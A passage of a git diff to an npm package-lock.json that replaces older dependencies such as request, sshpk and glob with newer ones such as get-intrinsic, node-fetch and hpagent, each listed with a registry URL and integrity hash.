"engines": { - "node": "*" + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0" + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, - "bin": { - "glob": "dist/esm/bin.mjs" + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", + "engines": { + "node": ">= 0.4" }, "funding": { - "url": "https://github.com/sponsors/isaacs" + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", "engines": { - "node": ">=4" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "has-symbols": "^1.0.3" }, "engines": { - "node": ">=6" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "function-bind": "^1.1.2" }, "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" + "node": ">= 0.4" } }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">=14" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } }, "node_modules/isomorphic-ws": { "version": "5.0.0", @@ -469,30 +457,10 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, "node_modules/jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } @@ -509,37 +477,25 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" }, "node_modules/jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", "engines": { "node": ">= 10.16.0" } }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -553,585 +509,242 @@ "node": ">=18.0.0" } }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", "engines": { - "node": ">=0.6.0" + "node": ">= 0.4" } }, - "node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "node_modules/mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dependencies": { - "mime-db": "1.49.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" + "node": ">= 0.6" } }, - "node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", + "node_modules/mime-types": { + "version": "2.1.32", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", + "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" + "mime-db": "1.49.0" }, "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" + "node": ">= 0.6" } }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">=8" + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/string-width-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" + "node_modules/oauth4webapi": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", + "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/string-width-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/string-width-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" + "wrappy": "1" } }, - "node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "node_modules/openid-client": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", + "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" + "jose": "^5.9.6", + "oauth4webapi": "^3.1.1" }, "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" + "url": "https://github.com/sponsors/panva" } }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "node_modules/pump": { + "version": "3.0.3", + "resolved": 